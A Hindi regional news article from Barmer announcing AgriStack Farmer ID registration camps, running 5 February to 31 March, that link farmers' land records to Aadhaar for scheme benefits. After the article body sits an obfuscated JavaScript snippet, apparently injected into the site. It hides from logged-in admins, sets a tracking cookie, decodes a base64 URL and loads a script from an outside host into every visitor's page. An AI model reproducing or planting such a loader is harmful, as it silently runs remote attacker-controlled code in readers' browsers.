कैन्द सरकार की किसानो के लिए ,एग्रीस्टेक कृषि योजनाओ़ं के तहत हर किसान का 11 अंकों की युनिक फार्मर आईडी होगी जारी।सभी योजनाओं का फायदा मिलेगा इसी आईडी से।5फरवरी से लगेगे गांव गांव शिविर।।

किसानों को मिलेगी 11 अंकों की यूनिक फार्मर आईडी, 5 फरवरी से लगेंगे फार्मर रजिस्ट्री शिविर
यूनिक आईडी से किसानों को मिलेगा पीएम किसान सम्मान निधि समेत अन्य योजनाओं का फायदा

बाड़मेर 1 फरवरी
किसानों को अब 11 अंको की यूनिक फार्मर आईडी मिलेगी इसके लिए ग्राम पंचायत स्तर पर 5 फरवरी से 31 मार्च तक फार्मर रजिस्ट्री शिविरों का आयोजन होगा। इसके लिए समुचित तैयारियां करने के निर्देश दिए गए है
जिला कलक्टर टीना डाबी ने बताया कि केन्द्र सरकार की एग्रीस्टेक योजना के तहत प्रत्येक किसान को 11 अंकों का एक यूनिक फार्मर आईडी नंबर मिलेगा इसको किसानों के आधार नंबर से लिंक किया जाएगा इस यूनिक आईडी नंबर के आधार पर किसानों को पीएम किसान सम्मान निधि सहित अन्य योजनाओं का लाभ मिलेगा उन्होंने बताया कि इसके लिए समस्त ग्राम पंचायतों में 5 फरवरी से फार्मर रजिस्ट्री शिविर लगाए जाए केन्द्र सरकार की ओर से पारदर्शिता सुनिश्चित करने एवं किसानों को जन कल्याणकारी योजनाओं से लाभांवित करवाने के लिए एग्रीस्टेक डिजिटल कल्चर इनिशिएटिव के तहत एग्रीस्टेक डिजिटल एग्रीकल्चर परियोजना शुरू की गई है। इसके तहत सभी राजस्व गांवों का डिजिटल मैप तैयार कराया गया है मोबाइल एप के माध्यम से जीआईएस आधारित रियल टाइम क्रॉप सर्वे कराया जा रहा है और अब इसके तहत प्रत्येक किसान का रजिस्ट्रेशन कराया जाएगा इस रजिस्ट्रेशन के बाद किसान को 11 अंकों का यूनिक नम्बर दिया जाएगा यह किसान की एक अलग पहचान होगी जिला कलक्टर टीना डाबी ने बताया कि इस फार्मर आई डी से किसान के समस्त कृषि भूखंड और हिस्से जुड़े रहेंगे इसे किसान के आधार से लिंक किया जाएगा। इसमें इस तरह की व्यवस्था सुनिश्चित की जाएगी कि अगर कोई किसान जमीन की खरीद एवं बेचान करता है, तो रिकॉर्ड अपने आप ही अपडेट हो जाए। इससे राज्य सरकार को किसानों, उनकी कृषि भूमि, फसल अपादन और संबंधित गतिविधियों पर रीयल-टाइम डेटा उपलब्ध होगा और सरकार बेहतर नीतियां बना सकेगी
यह विवरण दर्ज होगा फार्मर आईडी मेंः फार्मर आईडी में किसान का नाम, पिता का नाम उसके स्वामित्व वाले खेत का खसरा नंबर, मोबाइल नंबर और आधार नंबर दर्ज होगा। शिविरों में किसानों की जानकारी का व्यापक डेटाबेस तैयार करते हुए प्रत्येक किसान को विशिष्ट फार्मर आईडी प्रदान की जाएगी। इससे किसानों को केन्द्र एवं राज्य सरकार की कल्याणकारी योजनाओं का लाभ पहुंचाने में सुगमता एवं पारदर्शिता आएगी
पांच फरवरी से लगेंगे शिविरःनोडल अधिकारी एवं बाड़मेर उपखंड अधिकारी वीरमा राम ने बताया कि फार्मर रजिस्ट्री के लिए ग्राम पंचायतों में 5 फरवरी से 31 मार्च तक शिविर लगाए जाएंगे। इन शिविरों में दस्तावेज के आधार पर किसानों को मौके पर 11 अंक की यूनिक आईडी जारी की जाएगी। इसके अलावा पंचायतराज विभाग की विभिन्न योजनाओं का रजिस्ट्रेशन एवं फायदा इन शिविरों में मिलेगा। शिविरों में कृषि एवं सहकारिता विभाग के अधिकारी भी मौजूद रहेंगे
किसानों को यह मिलेगा फायदाः पीएम किसान सम्मान निधि की किश्त के साथ फसल बीमा का लाभ प्राप्त करने में आसानी होगी। खराबे की स्थिति में किसानों का चिन्हीकरण करना आसान होगा। इसके अलावा न्यूनतम समर्थन मूल्य पर खरीद के लिए किसानों का स्वतः रजिस्ट्रेशन हो जाएगा। किसानों कोे कल्याण की अन्य योजनाओं का लाभ प्राप्त करने के लिए बार-बार सत्यापन या रजिस्ट्रेशन नहीं कराना पड़ेगा
फार्मर रजिस्ट्री शिविर में पंचायतीराज से जुडे़ कार्य होंगेः मुख्य कार्यकारी अधिकारी सिद्धार्थ पलनीचामी ने बताया कि 5 फरवरी से आयोजित होने वाले फार्मर रजिस्ट्री शिविरों में जन्म मृत्यु पंजीयन प्रमाण पत्र जारी करने, लंबित पट्टों का निस्तारण करने, विमुक्त घुंमतु एवं अर्द्ध घुंमतु के लिए पटटा आवंटित करने, सामाजिक सुरक्षा पेंशन के लाभार्थियों का वार्षिक सत्यापन करवाने एवं परिसंपति रजिस्टर संधारित करवाने के निर्देश दिए गए है

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply